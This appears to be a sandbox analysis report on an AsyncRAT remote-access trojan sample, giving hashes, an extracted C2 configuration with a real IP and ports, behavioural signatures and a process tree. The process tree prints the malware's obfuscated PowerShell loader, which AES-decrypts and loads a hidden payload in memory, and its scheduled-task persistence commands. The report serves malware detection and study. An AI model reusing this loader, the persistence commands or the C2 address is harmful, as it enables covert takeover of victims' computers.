asyncrat | b706de1b9f7ef2d7f6c4d5fddd9525d907a7a0fdb087d98c4a01589f6178edc7

Analysis

max time kernel
90s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
08/02/2023, 18:49

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

iFYEJ.exe
Size

2.5MB
MD5

acfe53c70928d44f9cf498495145ec84
SHA1

2a12b327d4e5628904cc25c5f134732d6265e662
SHA256

b706de1b9f7ef2d7f6c4d5fddd9525d907a7a0fdb087d98c4a01589f6178edc7
SHA512

345143bcc9895282d2843efee182eb07bc0d0179c0c1e6ffcdd7ff9f1d44c252ffccb1b56c2b48c70b554f3427f6a1c23a6ea6b1c9e76edcbe655e88e247741c
SSDEEP

49152:Gg8nNv+SzYW4ZOUB5hempuE8OOTRmgysj8k4:Gg8h14

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

89.117.21.143:6606

89.117.21.143:7707

89.117.21.143:8808

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/4372-137-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Executes dropped EXE 1 IoCs

pid	Process
4760	mubnxc.bat.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
45	api.ipify.org
46	api.ipify.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4848 set thread context of 4372	4848	iFYEJ.exe	84

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4888	schtasks.exe
4152	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1832	timeout.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4660	powershell.exe
4660	powershell.exe
4760	mubnxc.bat.exe
4760	mubnxc.bat.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4848	iFYEJ.exe
Token: SeDebugPrivilege	4372	vbc.exe
Token: SeDebugPrivilege	4660	powershell.exe
Token: SeDebugPrivilege	4760	mubnxc.bat.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4760	mubnxc.bat.exe
4760	mubnxc.bat.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
4760	mubnxc.bat.exe
4760	mubnxc.bat.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4760	mubnxc.bat.exe

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 4848 wrote to memory of 364	4848	iFYEJ.exe	81
PID 4848 wrote to memory of 364	4848	iFYEJ.exe	81
PID 4848 wrote to memory of 364	4848	iFYEJ.exe	81
PID 364 wrote to memory of 4888	364	cmd.exe	83
PID 364 wrote to memory of 4888	364	cmd.exe	83
PID 364 wrote to memory of 4888	364	cmd.exe	83
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	84
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	84
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	84
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	84
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	84
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	84
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	84
PID 4848 wrote to memory of 4372	4848	iFYEJ.exe	84
PID 4372 wrote to memory of 1168	4372	vbc.exe	91
PID 4372 wrote to memory of 1168	4372	vbc.exe	91
PID 4372 wrote to memory of 1168	4372	vbc.exe	91
PID 4372 wrote to memory of 5000	4372	vbc.exe	93
PID 4372 wrote to memory of 5000	4372	vbc.exe	93
PID 4372 wrote to memory of 5000	4372	vbc.exe	93
PID 1168 wrote to memory of 4660	1168	cmd.exe	95
PID 1168 wrote to memory of 4660	1168	cmd.exe	95
PID 1168 wrote to memory of 4660	1168	cmd.exe	95
PID 5000 wrote to memory of 1832	5000	cmd.exe	96
PID 5000 wrote to memory of 1832	5000	cmd.exe	96
PID 5000 wrote to memory of 1832	5000	cmd.exe	96
PID 4660 wrote to memory of 4180	4660	powershell.exe	98
PID 4660 wrote to memory of 4180	4660	powershell.exe	98
PID 4660 wrote to memory of 4180	4660	powershell.exe	98
PID 4180 wrote to memory of 4760	4180	cmd.exe	100
PID 4180 wrote to memory of 4760	4180	cmd.exe	100
PID 4180 wrote to memory of 4760	4180	cmd.exe	100
PID 4760 wrote to memory of 4152	4760	mubnxc.bat.exe	101
PID 4760 wrote to memory of 4152	4760	mubnxc.bat.exe	101
PID 4760 wrote to memory of 4152	4760	mubnxc.bat.exe	101

C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe
"C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4848
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /C schtasks /create /tn \oFNTE /tr "C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:364
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn \oFNTE /tr "C:\Users\Admin\AppData\Local\Temp\iFYEJ.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /f
    3⤵
    - Creates scheduled task(s)
    PID:4888
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4372
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mubnxc.bat"' & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1168
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mubnxc.bat"'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4660
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mubnxc.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4180
      - C:\Users\Admin\AppData\Local\Temp\mubnxc.bat.exe
        
        "mubnxc.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $jwaHO = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mubnxc.bat').Split([Environment]::NewLine);foreach ($eKGSM in $jwaHO) { if ($eKGSM.StartsWith(':: ')) { $qdqSr = $eKGSM.Substring(3); break; }; };$QQCgF = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($qdqSr);$AmjNH = New-Object System.Security.Cryptography.AesManaged;$AmjNH.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AmjNH.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AmjNH.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h2/C7kSVdBKzfHpNijDOerbgICwzq39ikAsdwwbv4us=');$AmjNH.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7g2z5diB2473fR8+2MRCTQ==');$wgvzs = $AmjNH.CreateDecryptor();$QQCgF = $wgvzs.TransformFinalBlock($QQCgF, 0, $QQCgF.Length);$wgvzs.Dispose();$AmjNH.Dispose();$tkbaD = New-Object System.IO.MemoryStream(, $QQCgF);$TZnYn = New-Object System.IO.MemoryStream;$FtxeR = New-Object System.IO.Compression.GZipStream($tkbaD, [IO.Compression.CompressionMode]::Decompress);$FtxeR.CopyTo($TZnYn);$FtxeR.Dispose();$tkbaD.Dispose();$TZnYn.Dispose();$QQCgF = $TZnYn.ToArray();$IqKDG = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($QQCgF);$vjmLt = $IqKDG.EntryPoint;$vjmLt.Invoke($null, (, [string[]] ('')))
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4760
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\mubnxc.bat.exe" /rl HIGHEST /f
        7⤵
        Creates scheduled task(s)
        
        PID:4152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp16C4.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5000
  - - C:\Windows\SysWOW64\timeout.exe
      timeout 2
      4⤵
      Delays execution with timeout.exe
      PID:1832

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
912064d07dcffff0a99c28aa6754fbdd

SHA1
8f8baabad55b5f241891aa604dda7dcb891f716e

SHA256
f5de8ec60e46102bbb009d161f8b30c4ed4847d057e390109b22344f27241017

SHA512
57886b175183f88b58b20d93945342564d2d5cb5b77cd122c9d6fdb54aa04f353c4cbffc711bcd9823ad189d41ec727e054e8a127398400f53a0ea5018166001

Download Submit
C:\Users\Admin\AppData\Local\Temp\mubnxc.bat

Filesize
325KB

MD5
0e901cd4460579b61abece2b88f54035

SHA1
e776e751a2257cc6d56b85dd7f3c5c1a64bfc604

SHA256
59fbf83208e965445268cc973a63516dba60c68eced0d3cd8ed2e9499951dc32

SHA512
f15cbd6d506142f0c1f3f5271881c4e083d08976f34d18b72d4967efe33f4479acf3d3f3b5d9ea537f110be407a72c968204494428e1f0626ffe10bdc3df4a45

Download Submit
C:\Users\Admin\AppData\Local\Temp\mubnxc.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\mubnxc.bat.exe

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp16C4.tmp.bat

Filesize
167B

MD5
20e9730e536254e85365f045ef95825e

SHA1
9f5b3903b6efb80b07c481a1759cbd3aceabfc06

SHA256
41dfacf84349ff5a374a75ff0db57145b6001f543f3bda8342633448577a37b8

SHA512
8ae79e410dac21b62361e6994e7520c29c7b82c345aee4553284f019331416177fdd42e8a487a60c60114f7fc89d133b02033d28b22a218510630d7eebe0d3d6

Download Submit
memory/4372-141-0x00000000072A0000-0x00000000072BE000-memory.dmp

Filesize
120KB

Download
memory/4372-139-0x00000000062E0000-0x0000000006346000-memory.dmp

Filesize
408KB

Download
memory/4372-137-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4372-140-0x00000000071D0000-0x0000000007246000-memory.dmp

Filesize
472KB

Download
memory/4372-138-0x00000000061D0000-0x000000000626C000-memory.dmp

Filesize
624KB

Download
memory/4660-149-0x0000000005DF0000-0x0000000005E12000-memory.dmp

Filesize
136KB

Download
memory/4660-150-0x0000000005E90000-0x0000000005EF6000-memory.dmp

Filesize
408KB

Download
memory/4660-151-0x0000000006590000-0x00000000065AE000-memory.dmp

Filesize
120KB

Download
memory/4660-152-0x00000000076E0000-0x0000000007776000-memory.dmp

Filesize
600KB

Download
memory/4660-153-0x0000000006A60000-0x0000000006A7A000-memory.dmp

Filesize
104KB

Download
memory/4660-154-0x0000000006AB0000-0x0000000006AD2000-memory.dmp

Filesize
136KB

Download
memory/4660-148-0x0000000005690000-0x0000000005CB8000-memory.dmp

Filesize
6.2MB

Download
memory/4660-147-0x0000000004F90000-0x0000000004FC6000-memory.dmp

Filesize
216KB

Download
memory/4760-160-0x00000000071D0000-0x000000000784A000-memory.dmp

Filesize
6.5MB

Download
memory/4760-162-0x0000000006D90000-0x0000000006E22000-memory.dmp

Filesize
584KB

Download
memory/4760-163-0x0000000006D20000-0x0000000006D2A000-memory.dmp

Filesize
40KB

Download
memory/4760-165-0x0000000007120000-0x0000000007170000-memory.dmp

Filesize
320KB

Download
memory/4760-166-0x0000000007910000-0x00000000079C2000-memory.dmp

Filesize
712KB

Download
memory/4760-167-0x0000000007BA0000-0x0000000007D62000-memory.dmp

Filesize
1.8MB

Download
memory/4760-168-0x00000000089D0000-0x0000000008FE8000-memory.dmp

Filesize
6.1MB

Download
memory/4848-132-0x0000000000490000-0x0000000000718000-memory.dmp

Filesize
2.5MB

Download
memory/4848-133-0x0000000005860000-0x0000000005E04000-memory.dmp

Filesize
5.6MB

Download